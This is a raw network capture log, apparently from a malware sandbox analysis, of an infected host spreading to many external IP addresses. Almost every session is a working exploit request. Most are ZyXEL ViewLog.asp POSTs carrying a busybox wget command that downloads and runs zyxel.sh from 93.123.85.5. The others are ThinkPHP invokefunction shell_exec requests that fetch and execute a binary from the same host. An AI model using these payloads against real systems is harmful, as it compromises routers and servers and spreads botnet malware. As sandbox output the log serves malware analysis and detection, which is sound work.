                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:29.609813929 CET11012OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:37.544769049 CET12014OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:53.414671898 CET14033OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:25.666402102 CET18042OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              507192.168.2.235696831.136.29.2128080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:22.636183977 CET10185OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:23.626558065 CET10307OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:25.610455990 CET10522OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:29.609806061 CET11011OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:37.544758081 CET12013OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:53.414634943 CET14031OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:25.666399002 CET18041OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              508192.168.2.235342885.156.203.1478080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:22.643951893 CET10186OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              509192.168.2.235971294.122.12.2168080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:22.649524927 CET10187OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              51192.168.2.235132888.151.155.12280
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:16.970423937 CET2195OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:17.259581089 CET2203INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:18:17 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 150
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              510192.168.2.235707895.86.119.1338080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:22.680876017 CET10247OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              511192.168.2.234076685.214.244.958080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:23.305088997 CET10299OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:23.624840975 CET10306INHTTP/1.1 302 Found
                                                              Server: Mono-HTTPAPI/1.0
                                                              Date: Mon, 13 Nov 2023 21:19:23 GMT
                                                              Content-Length: 0
                                                              Keep-Alive: timeout=15,max=100
                                                              Location: login


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              512192.168.2.234633831.200.123.148080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:23.390367031 CET10301OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              513192.168.2.233619462.29.115.2428080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:23.390373945 CET10302OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              514192.168.2.233443494.120.111.1148080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:23.390700102 CET10302OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              515192.168.2.234257694.121.127.2488080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:23.395281076 CET10303OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              516192.168.2.2344054112.126.241.14780
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:24.339814901 CET10417OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:24.654767036 CET10419INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:19:26 GMT
                                                              Server: Apache
                                                              Content-Length: 11
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                                                              Data Ascii: Bad Request


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              517192.168.2.235936888.221.31.4380
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:27.004744053 CET10738OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:27.340004921 CET10760INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 257
                                                              Expires: Mon, 13 Nov 2023 21:19:27 GMT
                                                              Date: Mon, 13 Nov 2023 21:19:27 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 64 35 65 38 63 34 66 26 23 34 36 3b 31 36 39 39 39 31 30 33 36 37 26 23 34 36 3b 66 63 63 35 36 65 30 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;4d5e8c4f&#46;1699910367&#46;fcc56e0</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              518192.168.2.235727288.29.17.14080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:27.033910036 CET10740OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              519192.168.2.233555685.115.215.1168080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:27.089581966 CET10742OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:27.407126904 CET10762INHTTP/1.0 404 Not Found
                                                              Date: Sun, 11 Jan 1970 12:55:40 GMT
                                                              Server: Caddy v0.11.1
                                                              Connection: close
                                                              Content-Type: text/html; charset=ISO-8859-1
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              52192.168.2.235009888.202.236.19880
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:16.982099056 CET2197OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:17.286997080 CET2205INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Mon, 13 Nov 2023 21:17:30 GMT
                                                              Connection: close
                                                              Content-Length: 311
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              520192.168.2.233690894.131.3.1798080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:27.094590902 CET10742OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
